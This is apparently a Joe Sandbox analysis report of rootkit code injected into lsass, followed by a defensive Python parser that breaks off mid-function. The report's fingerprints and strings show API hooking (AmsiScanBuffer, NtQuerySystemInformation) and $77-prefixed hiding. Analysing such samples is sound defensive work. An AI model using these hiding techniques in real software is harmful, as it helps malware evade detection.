                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: 6f22da76264932056b23ab409b367e06aaa2eed78d6e5fe9efdbc6982ddf3388
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: 9C1140B0A2CB4843FF70D765A41D3D956A3BBB438EF40423A954686194FF7BF7588600
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: c3bcac0436af319acd82c5a0eb2dd64a2b81e7aede921fd794e88c02fc727a49
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: 97911672B451A887DF64CF25D008BADB792F764B9DF548124EE4907B88EA39DA13C710

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00000213BDCE1724: GetProcessHeap.KERNEL32 ref: 00000213BDCE172F
                                                                                                                                    • Part of subcall function 00000213BDCE1724: HeapAlloc.KERNEL32 ref: 00000213BDCE173E
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17AE
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17DB
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE17F5
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1815
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1830
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1850
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE186B
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE188B
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE18A6
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE18C6
                                                                                                                                  • SleepEx.KERNELBASE ref: 00000213BDCE1BDB
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE18E1
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1901
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE191C
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE193C
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1957
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1977
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1992
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: 6742bfce0cefe3a022eb4697f3d9c53f66ca175f2202356dc32e17777e7f7e79
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 2531FDF520864943EF51DB26D9483ED53A6ABA4BCCF0474318E0AC7295FE32EBB09310

                                                                                                                                  Control-flow Graph

                                                                                                                                   (control-flow graph of function 213bdce2dd0-213bdce3177 not reproduced; the rendered graph and its node/edge listing are omitted here)
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 3153948470-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: 9cafec5d88997d93dc954b4a66366b768a2dbfbf91637755cf3b3b2cd94444a2
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: ECA1A1B2218A9882EF54CF25D4487D9A3A6FB64B8DF045026EE0997794FF36EF44C340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: a1d03c42cce580e1748026c280aa21f99e469885c200b3bd280bed96587a3bdc
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: A9312772218B808AEB64CF60E8843EE7766F79470CF44452ADB4E47B99EF39C7498714
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: e0269caf7bd19dfda3f04994f19a542505f616c6e681d52d24d15451c6824a1b
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: 1E414C76218B8086EB60CB24E8443EE77A1F79875CF540625EA8D46B99EF39C759CB00
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:

Control-flow Graph
APIs
Strings
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp

Control-flow Graph
APIs
• GetCurrentThread.KERNEL32 ref: 00000213BDCE1E43
  • Part of subcall function 00000213BDCE21BC: GetModuleHandleA.KERNEL32(?,?,?,00000213BDCE1E75), ref: 00000213BDCE21D4
  • Part of subcall function 00000213BDCE21BC: GetProcAddress.KERNEL32(?,?,?,00000213BDCE1E75), ref: 00000213BDCE21E5
  • Part of subcall function 00000213BDCE6030: GetCurrentThreadId.KERNEL32 ref: 00000213BDCE606B
Strings
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll

Control-flow Graph
APIs
Strings
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d

Control-flow Graph
APIs
Strings
Similarity
• API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
• String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-

Control-flow Graph
APIs
Strings
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time

Control-flow Graph
APIs
Strings
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Utilization Percentage

Control-flow Graph
APIs
Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: a92af46b7b5b71cf65aaae097fec42ab6efc1618d0af6e60a31c9ed7b3840b2a
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: EBD17CB25087888AEF20CF2594483DD77A2F76579CF100225EA8D97B96EB36E781C704
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: d45e3b2ed8ecbdecce267b8202fa559070e6fcbf5107c787d19df8e591db04ce
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: 3BD19D32648B488AEF64DF6594483DD37A2F76978CF100215EE8957B96EF36C381CB40

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 544 213bdce104c-213bdce10b9 RegQueryInfoKeyW 545 213bdce10bf-213bdce10c9 544->545 546 213bdce11b5-213bdce11d0 544->546 545->546 547 213bdce10cf-213bdce111f RegEnumValueW 545->547 548 213bdce11a5-213bdce11af 547->548 549 213bdce1125-213bdce112a 547->549 548->546 548->547 549->548 550 213bdce112c-213bdce1135 549->550 551 213bdce1147-213bdce114c 550->551 552 213bdce1137 550->552 554 213bdce114e-213bdce1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 551->554 555 213bdce1199-213bdce11a3 551->555 553 213bdce113b-213bdce113f 552->553 553->548 556 213bdce1141-213bdce1145 553->556 554->555 555->548 556->551 556->553
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: 22600717cc6a7e8dc3bf2a8b803b997a987d0d42238187ec976b7a682b33e61e
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 32417F73218B84C6EB60CF21E44879A77A2F388B9CF448125DB894B75CEF39D659CB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: c8a60c52956f598d8f3063309a4119c09887092860eac6659d4b426bee2e2774
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: 43114F31628B4083EB10CB21F4587996B61F799BECF544215EB9906AACDF3DC758CB44
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 4d131d723dfdcd50980dab0133fe6db942d4e7479698aba863573010cd8919ea
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: E58104B060C74987FE54EB66E45D3E96693ABB178CF644434AA04477D6FB3BEB068300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: a8ca6342e7c158e2d431ef57dd4bafd73fca06972d6f43405d452a5c0f337849
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 5E81DF3068D34946FE50DB65E84D3D927E3AB71B8CF684425AE484B7D2FA3BCB458700
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE98F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE98FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE9929
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE9997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE99A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction ID: 86894928232fa96f08b18e098bcd1db2f16ce1c2bd2bea712a89d2e3e82895e7
                                                                                                                                  • Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction Fuzzy Hash: 3C31C27121A74492EE52DB02A8087D53396F764BACF590635ED1D4B394FF3AE7458310
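The records above are what an analyst mines for host indicators: the String ID \\.\pipe\$77childproc in the File/Process/Handle function, the api-ms- loader that resolves imports through LoadLibraryExW and GetProcAddress, and the csm exception-handling function that carries the same API String ID (849930591-393685449) in two lsass dumps, hcaresult_10_2 at 0x213BDCE0000 and hcaresult_10_3 at 0x213BDCB0000. The Python below is an added example, not code from Joe Sandbox or from the analysed sample. It parses this record layout (one record per "APIs" header, "• Key: value" fields, snapshot names of the form hcaresult_<proc>_<dump>_<base>_<process>.jbxd; the naming scheme is an assumption about the export, taken from the names visible here) over a trimmed copy of four records constructed from this section, groups functions by fingerprint to show code that is present in more than one memory region, and flags strings carrying the $77 prefix that the 77Rootkit (r77) family puts on what it hides.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Added example, not Joe Sandbox code. Assumes the text layout of this section:
# one record per "APIs" header, "• Key: value" fields, and snapshot names of the
# form hcaresult_<proc>_<dump>_<base>_<process>.jbxd (assumed from the names seen).
# Constructed sample: four records from this section, trimmed to the lines the
# parser needs (csm function in two lsass dumps, the $77childproc pipe function,
# the api-ms- loader with two of its API lines).
SAMPLE = r"""
APIs
Strings
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
APIs
• Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
APIs
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$77childproc
• API String ID: 166002920-421986751
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE98F1
• GetProcAddress.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE99A3
Strings
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
"""

KV = re.compile(r"^\s*•\s*([^:]+?):\s*(.*?)\s*$")
API_CALL = re.compile(r"^\s*•\s*(\w+)\.(\w+)\(.*\),\s*ref:\s*([0-9A-Fa-f]+)")
SNAPSHOT = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(\w+)\.jbxd")
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
R77_PREFIX = "$77"  # the prefix r77 (77Rootkit) puts on what it hides


@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)  # (api, module, call-site address)
    fields: dict = field(default_factory=dict)     # "Key" -> value of "• Key: value"
    process: str = ""                              # hosting process, from the snapshot name
    image_base: int = 0                            # dump base, from the snapshot name


def parse_records(text):
    """One FunctionRecord per 'APIs' header; API call lines are only read inside
    the APIs part, every other bullet with a colon is a key/value field."""
    records, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur, in_apis = FunctionRecord(), True
            records.append(cur)
            continue
        if cur is None or s in HEADERS:
            in_apis = False
            continue
        m = API_CALL.match(line)
        if in_apis and m:
            cur.api_calls.append((m.group(1), m.group(2), int(m.group(3), 16)))
            continue
        m = KV.match(line)
        if not m:
            continue  # CFG edge lists and the Executed/Not Executed legend land here
        key, value = m.groups()
        cur.fields[key] = value
        if key == "Snapshot File" and (snap := SNAPSHOT.search(value)):
            cur.image_base, cur.process = int(snap.group(3), 16), snap.group(4)
    return records


def functions_by_fingerprint(records):
    """'API String ID' -> sorted (process, image_base) list. The same fingerprint
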